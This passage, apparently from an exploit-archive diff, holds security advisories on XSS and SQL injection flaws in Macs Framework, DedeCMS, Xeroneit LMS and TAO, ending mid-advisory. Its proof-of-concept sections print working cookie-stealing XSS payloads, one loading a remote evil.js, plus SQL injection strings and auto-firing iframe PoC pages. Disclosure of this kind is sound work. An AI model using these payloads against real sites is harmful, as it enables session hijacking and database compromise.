Content-Type: text/html; charset=UTF-8
Note: Execution Point via Log Management (AP) on Webdav View or Web View
Reference(s):
https://SeedDMS.localhost:8080/
https://SeedDMS.localhost:8080/op/op.AddEvent.php
https://SeedDMS.localhost:8080/out/out.ViewFolder.php
https://SeedDMS.localhost:8080/out/out.AddEvent.php
https://SeedDMS.localhost:8080/out/out.LogManagement.php
https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=
Solution - Fix & Patch:
=======================
1. Parse and escape the name and comment input field on transmit to sanitize
2. Filter and restrict the input field of the name and comments
parameter for special chars to prevent injects
3. Parse the output location of all web and webdav logfiles to prevent
the execution point
Security Risk:
==============
The security risk of the persistent cross site web vulnerabilities in
the seeddms web-application are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

482
exploits/php/webapps/48325.txt Normal file
View file

@ -0,0 +1,482 @@
# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
# CVE: N/A
Document Title:
===============
Macs Framework v1.14f CMS - Multiple Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2206
Release Date:
=============
2020-04-14
Vulnerability Laboratory ID (VL-ID):
====================================
2206
Common Vulnerability Scoring System:
====================================
7.4
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management
System. It focuses mainly on the
Edit In Place editing concept. It comes with a built in blog with
moderation support, user manager section,
roles manager section, SEO / SEF URL.
https://sourceforge.net/projects/macs-framework/files/latest/download
(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Macs Framework v1.1.4f CMS.
Affected Product(s):
====================
Macrob7
Product: Macs Framework v1.14f - Content Management System
Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
1.1 & 1.2
Multiple non-persistent cross site scripting web vulnerabilities has
been discovered in the official Mac Framework v1.1.4f Content Managament
System.
The vulnerability allows remote attackers to manipulate client-side
browser to web-applicatio requests to compromise user sesson credentials
or to
manipulate module content.
The first vulnerability is located in the search input field of the
search module. Remote attackers are able to inject own malicious script
code as
search entry to execute the code within the results page that is loaded
shortly after the request is performed. The request method to inject is
POST
and the attack vector is located on the client-side with non-persistent
attack vector.
The second vulnerability is located in the email input field of the
account reset function. Remote attackers are able to inject own
malicious script code as
email to reset the passwort to execute the code within performed
request. The request method to inject is POST and the attack vector is
located on the
client-side with non-persistent attack vector.
Successful exploitation of the vulnerabilities results in session
hijacking, non-persistent phishing attacks, non-persistent external
redirects to
malicious source and non-persistent manipulation of affected or
connected application modules.
Request Method(s):
[+] POST
Vulnerable Parameter(s):
[+] searchString
[+] emailAdress
1.3
Multiple remote sql-injection web vulnerabilities has been discovered in
the official Mac Framework v1.1.4f Content Managament System.
The vulnerability allows remote attackers to inject or execute own sql
commands to compromise the dbms or file system of the application.
The sql injection vulnerabilities are located in the `roleId` and
`userId` of the `editRole` and `deletUser` module. The request method to
inject or execute commands is GET and the attack vector is located on
the application-side. Attackers with privileged accounts to edit are
able to inject own sql queries via roleid and userid on deleteUser or
editRole. Multiple unhandled and broken sql queries are visible as default
debug to output for users as well.
Exploitation of the remote sql injection vulnerability requires no user
interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database
management system, web-server and web-application compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] deleteUser
[+] editRole
Vulnerable Parameter(s):
[+] userId
[+] roleId
Proof of Concept (PoC):
=======================
Google Dork(s): intitle, subtitle & co.
Site Powered by Mac's PHP MVC Framework Framework of the future
Design downloaded from Zeroweb.org: Free website templates, layouts, and
tools.
1.1
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without user account and with low user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
PoC: Payload
>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/search" id="searchForm">
<span class="searchLabel">Search Site:</span><input type="searchString"
value="" name="searchString" class="searchString">
<input type="submit" value="Search" class="searchSubmit">
</form><br>
<span class="error">No Results found for: "<iframe src="evil.source"
onload="alert(document.cookie)"></span>
--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/search
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://macs-cms.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
Upgrade-Insecure-Requests: 1
searchString=>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 9865
1.2
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without user account and with low user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com
PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/login"
class="ajax" ajaxoutput="#loginMessage">
<table style="width:100%">
<tbody><tr>
<td style="width: 20px">Username:</td>
<td><input type="text" name="username"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type="password" name="password"></td>
</tr>
<tr>
<td colspan="2"><input type="submit" value="Login"></td>
</tr>
<tr>
<td colspan="2"><br><div id="loginMessage" style="display:
block;">Invalid Username or Password</div></td>
</tr>
</tbody></table>
<br>
<a
href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword"
class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a>
<input type="hidden" name="scrollPosition" value="102"></form>
<div id="forgotPassword" style="display: block;">
<form class="ajax" method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess"
ajaxoutput="#forgotPasswordReturn">
Enter your email address: <input type="text" name="emailAddress"><br>
<input type="submit" value="Send Email">
</form>
<br>
<div id="forgotPasswordReturn" style="display: block;">Cannot find user
with Email address:
test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com</iframe></div>
</div>
--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 335
-
https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 105
1.3
The remote sql injection web vulnerability can be exploited by remote
attackers with privileged application user account and without user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
PoC: Payload
%27-1%20order%20by%205--
%27-1%20union select 1,2,3,4,@@version--
PoC: Exploitation
<html>
<head><body><title>Mac's CMS SQL Injection PoC</title>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union
select 1,2,3,4,@@version--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union
select 1,2,3,4,@@version--%20>
</body></head>
</html>
--- PoC Session Logs [GET] ---
https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1
order by 5--
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1;
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 53
--- [SQL Error Exception Logs] ---
SQLSTATE[HY000]: General error: 1 near "1": syntax error
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 unrecognized token: "''';"
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range -
should be between 1 and 5
-
5.0.12 'pwnd
This page was created in 1.5665068626404 seconds
Security Risk:
==============
1.1 & 1.2
the security risk of the client-side cross site scripting web
vulnerabilities in the search and email reset function are estimated as
medium.
1.3
The security risk of the remote sql injection web vulnerabilities in the
id parameters on delete are estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

363
exploits/php/webapps/48326.txt Normal file
View file

@ -0,0 +1,363 @@
# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor Link: http://www.dedecms.com
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A
Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2195
Release Date:
=============
2020-04-09
Vulnerability Laboratory ID (VL-ID):
====================================
2195
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Welcome to use the most professional PHP website content management
system in China-Zhimeng content management system,
he will be your first choice for easy website building. Adopt XML name
space style core templates: all templates are
saved in file form, which provides great convenience for users to design
templates and website upgrade transfers.
The robust template tags provide strong support for webmasters to DIY
their own websites. High-efficiency tag caching
mechanism: Allows the caching of similar tags. When generating HTML, it
helps to improve the reaction speed of the
system and reduce the resources consumed by the system.
(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site vulnerabilities in
the official DedeCMS v5.7 SP2 (UTF8) web-application.
Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System v5.7 SP2
Vulnerability Disclosure Timeline:
==================================
2020-04-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerabilities has been
discovered in the official DedeCMS v5.7 SP2 UTF8 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent script code inject web vulnerabilities are located in the
`activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor`
and `CKEditorFuncNum`parameters of the `file_pic_view.php`,
`file_manage_view.php`, `tags_main.php`, `select_media.php`,
`media_main.php` files.
The attack vector of the vulnerability is non-persistent and the request
method to inject is POST. Successful exploitation of the vulnerability
results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation
of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable File(s):
[+] file_pic_view.php
[+] file_manage_view.php
[+] tags_main.php
[+] select_media.php
[+] media_main.php
Vulnerable Parameter(s):
[+] tag
[+] keyword
[+] activepath
[+] fmdo=move&filename & fmdo=edit&filename
[+] CKEditor & CKEditor=body&CKEditorFuncNum
Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers with
privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Request: Examples
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads
https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en
PoC: Payload
".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].*
onload=alert(document.domain)>
>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png
onload=alert(document.domain)">
>"><iframe src=evil.source onload=alert(document.domain)>
%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E
%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E
%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E
PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe
src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway=">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe
src=evil.source
onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe
src=evil.source onload=alert(document.domain)>2&langCode=en">
...
--- PoC Session Logs [POST] --- (Some Examples ...)
https://test23.localhost:8080/dede/media_main.php
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: https://test23.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/media_main.php
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php
keyword=>"%20<<img
src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1830
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon,
06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/dede/file_pic_view.php
?activepath=%2Fuploads%2F>"
<"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer:
https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.6.40
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/include/dialog/select_media.php?
CKEditor=>"><iframe src=evil.source
onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source
onload=alert("2")>2&langCode=en
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1;
DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1137
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
Reference(s):
https://test23.localhost:8080/dede/media_main.php
https://test23.localhost:8080/dede/tags_main.php
https://test23.localhost:8080/dede/file_pic_view.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/include/dialog/select_media.php
Solution - Fix & Patch:
=======================
1. Parse the content to disallow html / js and special chars on the
affected input fields
2. Restrict the vulnerable paramter prevent injects via post method request
3. Secure the output location were the content is insecure sanitized
delivered as output
Security Risk:
==============
The security risk of the application-side persistent cross site
scripting web vulnerabilities in the different modules are estimated as
medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--

34
exploits/php/webapps/48328.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Google Dork: "LMS v3.0 - Xerone IT "
# Date: 2020-04-09
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link:
https://xeroneit.net/portfolio/library-management-system-lms
# Software Demo :https://xeroneit.co/demo/lms/home/login
# Version: v3.0
# Category: webapps
1. Description
scritp has SQLI in books category at this dir
/lms/home/book?category_name=00*SQLI
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '0' GROUP BY
`title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3
SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as
available_book, `book_info`.`number_of_books`, `book_info`.`id`,
`book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as
`size`, `book_info`.`publishing_year`, `book_info`.`publisher`,
`book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`,
`book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`,
`book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'',
category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`,
`author`, `edition` ORDER BY `title` ASC LIMIT 21
Filename: models/Basic.php
Line Number: 284

433
exploits/php/webapps/48341.txt Normal file
View file

@ -0,0 +1,433 @@
# Title: TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.taotesting.com
# Software Link: https://www.taotesting.com/product/
# CVE: N/A
Document Title:
===============
TAO Open Source Assessment Platform v3.3.0 RC02 - Multiple Web
Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2215
Release Date:
=============
2020-04-16
Vulnerability Laboratory ID (VL-ID):
====================================
2215
Common Vulnerability Scoring System:
====================================
4
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Accelerating innovation in digital assessment. The TAO assessment
platform gives you the freedom, control, and
support to evolve with today's learners. For organizations who want the
freedom to control their assessment
software from authoring to delivery to reporting.
(Copy of the Homepage: https://www.taotesting.com/product/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
cross site vulnerabilities in the TAO Open Source Assessment Platform
v3.3.0 RC02.
Affected Product(s):
====================
Product: TAO Open Source Assessment Platform v3.3.0 RC02
Vulnerability Disclosure Timeline:
==================================
2020-04-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
1.1
A html injection web vulnerability has been discovered in the TAO Open
Source Assessment Platform v3.3.0 RC02 web-application.
The vulnerability allows remote attackers to inject own malicious html
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The html inject web vulnerability is located in the `userFirstName`,
`userLastName`, `userMail`, `password2`, and `password3`
parameters of the user account input field. The request method to inject
